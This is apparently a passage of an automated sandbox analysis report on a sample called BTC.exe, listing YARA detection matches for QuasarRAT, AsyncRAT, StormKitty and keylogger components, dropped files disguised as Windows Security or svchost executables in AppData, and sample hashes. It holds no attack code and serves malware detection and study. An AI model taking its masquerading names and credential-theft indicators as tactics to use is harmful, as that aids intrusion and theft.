                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
                            Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
                            Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects StormKitty infostealer Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: QuasarRAT payload Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: QuasarRAT payload Author: ditekSHen
                            Creates files with lurking names (e.g. Crack.exe)
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\crack.exeJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\Cracked.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crack.exe.logJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Cracked.exe.logJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeCode function: 3_2_00007FF848F03D0E NtProtectVirtualMemory,3_2_00007FF848F03D0E
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 21_2_00007FF848F43DBE NtProtectVirtualMemory,21_2_00007FF848F43DBE
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 26_2_00007FF848F33DBE NtProtectVirtualMemory,26_2_00007FF848F33DBE
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeCode function: 3_2_00007FF848F03D0E3_2_00007FF848F03D0E
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeCode function: 3_2_00007FF848F03D883_2_00007FF848F03D88
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_052363784_2_05236378
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05235AA84_2_05235AA8
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_052397304_2_05239730
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_052357604_2_05235760
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_052397404_2_05239740
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C105FE4_2_05C105FE
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C106004_2_05C10600
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C1C1084_2_05C1C108
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C1C0F74_2_05C1C0F7
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C15D534_2_05C15D53
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C15D604_2_05C15D60
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_015263785_2_01526378
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_01525AA85_2_01525AA8
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_015297405_2_01529740
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_015257605_2_01525760
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_015297305_2_01529730
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_05DE05FE5_2_05DE05FE
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_05DE06005_2_05DE0600
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_05DEC1085_2_05DEC108
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_05DEC0F75_2_05DEC0F7
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_05DE5D535_2_05DE5D53
                            Source: C:\Users\user\AppData\Roaming\update.exeCode function: 5_2_05DE5D605_2_05DE5D60
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 6_2_0159A6E06_2_0159A6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 6_2_01599A086_2_01599A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 6_2_015996C06_2_015996C0
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeCode function: 7_2_00007FF848F172F67_2_00007FF848F172F6
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeCode function: 7_2_00007FF848F180A27_2_00007FF848F180A2
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeCode function: 7_2_00007FF848F10F097_2_00007FF848F10F09
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_049CA6E016_2_049CA6E0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_049C9A0816_2_049C9A08
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_049C96C016_2_049C96C0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_0503BF6016_2_0503BF60
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_0503ACC816_2_0503ACC8
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_0503907C16_2_0503907C
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_0637159816_2_06371598
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041CA9B017_2_041CA9B0
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041CA99B17_2_041CA99B
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 21_2_00007FF848F43DBE21_2_00007FF848F43DBE
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 24_2_02B8A6E024_2_02B8A6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 24_2_02B89A0824_2_02B89A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 24_2_02B8E6F924_2_02B8E6F9
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 24_2_02B8E70824_2_02B8E708
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 24_2_02B8643824_2_02B86438
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 24_2_02B896C024_2_02B896C0
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 26_2_00007FF848F32B3026_2_00007FF848F32B30
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 26_2_00007FF848F33DBE26_2_00007FF848F33DBE
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 26_2_00007FF848F35E1126_2_00007FF848F35E11
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeCode function: 27_2_00007FF848F10F0927_2_00007FF848F10F09
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeCode function: 58_2_00007FF848F20F0958_2_00007FF848F20F09
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeCode function: 59_2_00007FF848F10F0959_2_00007FF848F10F09
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 87_2_028AA6E087_2_028AA6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 87_2_028A9A0887_2_028A9A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 87_2_028AE6F987_2_028AE6F9
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 87_2_028AE70887_2_028AE708
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 87_2_028A96C087_2_028A96C0
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeCode function: 92_2_00007FF848F40F0992_2_00007FF848F40F09
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 93_2_0258A6E093_2_0258A6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 93_2_02589A0893_2_02589A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 93_2_0258E6F993_2_0258E6F9
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 93_2_0258E70893_2_0258E708
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 93_2_025896C093_2_025896C0
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows Defender Service Host.exe4 vs BTC.exe
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientAny.exe" vs BTC.exe
                            Source: BTC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
